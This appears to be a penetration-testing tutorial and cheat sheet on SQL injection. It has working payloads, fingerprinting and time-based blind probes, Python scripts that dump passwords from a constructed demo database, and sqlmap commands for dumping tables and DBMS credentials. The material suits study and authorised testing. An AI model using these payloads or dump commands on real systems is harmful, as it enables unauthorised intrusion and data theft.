SQL Injection

What is it?

Common SQL Verbs

Common SQL Statement verbs

  • SELECT - Retrieves data from a table

  • INSERT - Adds data to a table

  • DELETE - Removes rows from a table

  • UPDATE - Modifies data in a table

  • DROP - Deletes a whole table (or database)

  • UNION - Combines the result sets of two or more SELECT queries

SQL Query Modifiers

  • WHERE

  • AND/OR

  • LIMIT #1, #2 - returns #2 rows starting at offset #1 (MySQL syntax; MSSQL uses TOP n, Oracle uses ROWNUM)

  • ORDER BY # - sorts by the #-th column of the result; it errors once # exceeds the number of columns, which is how the column count is discovered

Special Characters

  • ' and " - string delimiters (MySQL accepts both; MSSQL, Oracle and PostgreSQL use ' for strings and " for identifiers)

  • --, /*, and # - comment delimiters (-- needs a trailing space in MySQL, # is MySQL-only, /* opens a block comment that runs to */)

  • * and % - wildcards (* selects all columns, % matches any sequence of characters in LIKE)

  • ; - Ends a SQL statement (stacked queries only work if the application's database API allows multiple statements per call)

  • = - comparison operator (used in always-true conditions such as 1=1 or 'a'='a')

Example

When testing for SQL injection, start with input that should cause a syntax error (an unbalanced quote). Next, add characters that restore the normal result (a comment or a balancing quote); if that works, the input is being interpreted as SQL rather than as data. Once the payload runs cleanly, add verbs or modifiers knowing they will execute.

Sample server side code

<?php
// Vulnerable on purpose: the name parameter is concatenated straight into the query text.
$sql = "SELECT * FROM Users WHERE lname='{$_GET['name']}';";

Normal input: Defender
URL: http://test.com/sqli.php?name=Defender
SQL query: SELECT * FROM Users WHERE lname='Defender';
Result: Normal result

Injected input: Defender'
URL: http://test.com/sqli.php?name=Defender'
SQL query: SELECT * FROM Users WHERE lname='Defender'';
Result: The unbalanced ' causes a syntax error

Injected input: Defender'; -- 
URL: http://test.com/sqli.php?name=Defender'; -- 
SQL query: SELECT * FROM Users WHERE lname='Defender'; -- ';
Result: Normal result; the comment swallows the trailing '; so the statement parses again (in MySQL the space after -- is required, so URL-encode it as %20)

Injected input: Defender' or 1=1; -- 
URL: http://test.com/sqli.php?name=Defender' or 1=1; -- 
SQL query: SELECT * FROM Users WHERE lname='Defender' or 1=1; -- ';
Result: Returns every row from the Users table, because 1=1 is always true

Balancing a payload

Quote balancing

If commenting with -- does not work, balance the quotes instead with a string comparison so the query's own closing quote is reused. Example injection: Defender' OR 'a'='a . Resulting statement: SELECT ... WHERE lname='Defender' OR 'a'='a'; . The original query's trailing ' closes the injected literal, so no comment is needed.

Column numbers balancing

INSERT and UNION statements must supply exactly as many columns as the table (INSERT) or the original SELECT (UNION). Find the count with ORDER BY #, increasing # until the query errors; the last value that worked is the column count.

Data type balancing

INSERT and UNION statements also require the injected values to be type-compatible with the corresponding columns. NULL is compatible with every type, so start with NULL placeholders and swap in a real value one column at a time to find the string and numeric positions.
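The probing procedure from the Example section and the three balancing steps above, run end to end against a constructed in-memory SQLite database. This is an added example, not code from the original page: the Users and Logins tables, their rows and the helper names are assumptions; the vulnerable query is the same string concatenation as the PHP sample, and the parameterized version is included beside it for contrast.

```python
import sqlite3


def make_db():
    """Constructed sample database (assumption): the page's Users table plus a
    second table that the UNION step dumps."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, lname TEXT, role TEXT)")
    conn.executemany("INSERT INTO Users (lname, role) VALUES (?, ?)",
                     [("Defender", "user"), ("Admin", "admin"), ("Analyst", "user")])
    conn.execute("CREATE TABLE Logins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO Logins VALUES ('root', 'hunter2')")
    return conn


def vulnerable_lookup(conn, name):
    """Same defect as the page's PHP: untrusted input is concatenated into the SQL text."""
    sql = f"SELECT * FROM Users WHERE lname='{name}';"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, name):
    """Hardened form: a bound parameter is always data, never SQL, whatever it contains."""
    return conn.execute("SELECT * FROM Users WHERE lname=?;", (name,)).fetchall()


def probe(conn, name):
    """Send one candidate input and report what an attacker can observe:
    ('ok', rows) on success, ('error', message) on a SQL error."""
    try:
        return ("ok", vulnerable_lookup(conn, name))
    except sqlite3.Error as e:
        return ("error", str(e))


def find_column_count(conn, max_cols=10):
    """Column-number balancing: ORDER BY n is accepted while n <= column count
    and errors as soon as n exceeds it."""
    for n in range(1, max_cols + 1):
        status, _ = probe(conn, f"Defender' ORDER BY {n} -- ")
        if status == "error":
            return n - 1
    return None  # more columns than max_cols; raise the bound


def union_dump(conn, ncols, table, column):
    """UNION-based extraction with a balanced column count. NULL pads the other
    columns because NULL is compatible with every column type (data type
    balancing); an impossible lname ('x') keeps the original rows out of the result."""
    select_list = ", ".join([column] + ["NULL"] * (ncols - 1))
    payload = f"x' UNION SELECT {select_list} FROM {table} -- "
    return [row[0] for row in vulnerable_lookup(conn, payload)]


if __name__ == "__main__":
    conn = make_db()
    # Step 1: break it, step 2: balance it, step 3: inject a modifier.
    for name in ["Defender", "Defender'", "Defender'; -- ",
                 "Defender' or 1=1; -- ", "Defender' OR 'a'='a"]:
        print(repr(name), "->", probe(conn, name))
    ncols = find_column_count(conn)
    print("column count:", ncols)
    print("unbalanced UNION:", probe(conn, "x' UNION SELECT password FROM Logins -- "))
    print("balanced UNION:", union_dump(conn, ncols, "Logins", "password"))
    print("parameterized query with the same payload:", safe_lookup(conn, "Defender' or 1=1; -- "))
```

SQLite accepts -- without a trailing space and is dynamically typed, so the type-balancing step cannot be made to fail here; on MSSQL or Oracle a string in a numeric position of the UNION raises a conversion error, which is why the NULL padding matters.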

Exploiting

DB Fingerprinting

# Version functions/parameters
## MySQL or SQL Server:
SELECT @@version
## Oracle:
SELECT banner FROM v$version

# String concatenation (each DBMS accepts a different form; the one that yields 'Test' identifies it)
MySQL: 'Te' 'st'
MSSQL: 'Te'+'st'
Oracle: 'Te'||'st'

# Unique numeric functions/variables (error on every DBMS except the one that defines them)
MySQL: connection_id()
MSSQL: @@pack_received
Oracle: BITAND(1,1)

In-band SQL injection

Blind SQL injection

Nothing is reflected in the response, so test with a time delay: send ' {sleep 10} and then ' {sleep 20} (for example ' AND SLEEP(10)-- on MySQL, or '; WAITFOR DELAY '0:0:10'-- on MSSQL) and check whether the response time tracks the requested delay. Using two different delays rules out ordinary network latency.
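One way to turn the DB fingerprinting probes above and the blind technique into code, as an added example that is not part of the original page. It is built on a constructed in-memory SQLite database (the Users table and its rows are assumptions), so the oracle is boolean (does the Defender row come back?) rather than time-based; for a time-based oracle the same functions would compare response time against the requested delay. The SQLite probe sqlite_version() is added here as an assumption alongside the page's three.

```python
import sqlite3


def make_db():
    """Constructed sample database (assumption mirroring the page's Users table)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (id INTEGER PRIMARY KEY, lname TEXT, role TEXT);
        INSERT INTO Users (lname, role) VALUES ('Defender', 'user'), ('Admin', 'admin');
    """)
    return conn


def make_oracle(conn):
    """Boolean oracle over the page's injectable query: True when the injected
    condition holds (the Defender row is returned), False on no rows or a SQL error.
    A time-based variant would inject ' AND SLEEP(10)-- (MySQL) or
    '; WAITFOR DELAY '0:0:10'-- (MSSQL) and return True when the reply is slow."""
    def oracle(condition):
        payload = f"Defender' AND ({condition}) -- "
        try:
            rows = conn.execute(f"SELECT * FROM Users WHERE lname='{payload}';").fetchall()
            return len(rows) > 0
        except sqlite3.Error:
            return False
    return oracle


# Expressions that evaluate only on one DBMS: the page's three probes plus
# SQLite's sqlite_version() (assumption) so the demo can identify its own backend.
FINGERPRINT_PROBES = {
    "MySQL": "connection_id()=connection_id()",
    "MSSQL": "@@pack_received=@@pack_received",
    "Oracle": "BITAND(1,1)=1",
    "SQLite": "sqlite_version()=sqlite_version()",
}


def fingerprint(oracle):
    """Return the DBMS families whose unique function evaluates without error."""
    return [dbms for dbms, expr in FINGERPRINT_PROBES.items() if oracle(expr)]


def blind_int(oracle, expr, lo, hi):
    """Binary-search the integer value of SQL expression `expr`, which must lie in
    [lo, hi]; each oracle call answers one 'is it greater than mid?' question."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(oracle, subquery, max_len=64):
    """Extract a string without ever seeing it: first its length, then the code
    point of each position via unicode(substr(...)), which avoids having to quote
    the guessed character inside the payload."""
    length = blind_int(oracle, f"length({subquery})", 0, max_len)
    return "".join(
        chr(blind_int(oracle, f"unicode(substr({subquery}, {i}, 1))", 0, 127))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    oracle = make_oracle(make_db())
    print("DBMS:", fingerprint(oracle))
    print("admin lname:", blind_string(oracle, "(SELECT lname FROM Users WHERE role='admin')"))
```

Each extracted character costs seven oracle queries with this binary search, against up to 95 for a linear guess over printable ASCII; with a time-based oracle every query also costs the chosen delay, so the search strategy dominates total run time.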

Cheat Sheet

Display the full SQL statement being executed (MySQL): the info column of information_schema.processlist holds the text of every running statement, so injecting it into a reflected field shows the exact query you are inside

SELECT info FROM information_schema.processlist

Tools

SQLMAP

Open-source, Python-based command-line SQL injection tool created by Bernardo Damele A. G. (@inquisb) and Miroslav Stampar (@stamparm)

See sqlmap extended help

sqlmap -hh

Test for vulnerability (-r reads a raw HTTP request saved from a proxy; every parameter in it is tested)

sqlmap -r sqli.txt.raw 

Lists Database

sqlmap -r sqli.txt.raw  --dbs

With found database, lets list the tables

sqlmap -r sqli.txt.raw -D Logins --tables

With found tables, list all columns

sqlmap -r sqli.txt.raw -D Logins -T usernames --columns

Dump all records on a table

sqlmap -r sqli.txt.raw -D Logins -T usernames --dump

Search all columns for a string (Example "pass")

sqlmap -r sqli.txt.raw --search -C pass

For a found database and table, dump its rows

Within a pentest you don't want to dump everything: dumped data is written to disk on your machine (sqlmap's output directory, ~/.local/share/sqlmap/output by default). Instead of a plain --dump, use --count to see how many entries the table has, then dump a small sample with --dump --start=1 --stop=3

sqlmap -r sqli.txt.raw -D secretdb -T password --dump

Alternatively, dump only the 38th entry with --start and --stop (to filter by a column value instead, use --where with a SQL condition, e.g. --where="id=38")

sqlmap -r sqli.txt.raw -D secretdb -T password --dump --start=38 --stop=38

Grab user and password on database management system (Used to administer DB)

sqlmap -r sqli.txt.raw --users --passwords

SQL Injection Defenses

Resources

HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection

NetSPI SQL injection wiki: https://sqlwiki.netspi.com/

Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/

OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection

NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576

swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

Understanding GraphQL schemas and types: https://graphql.org/learn/schema/

byt3bl33d3r's MS SQL command reference: https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference
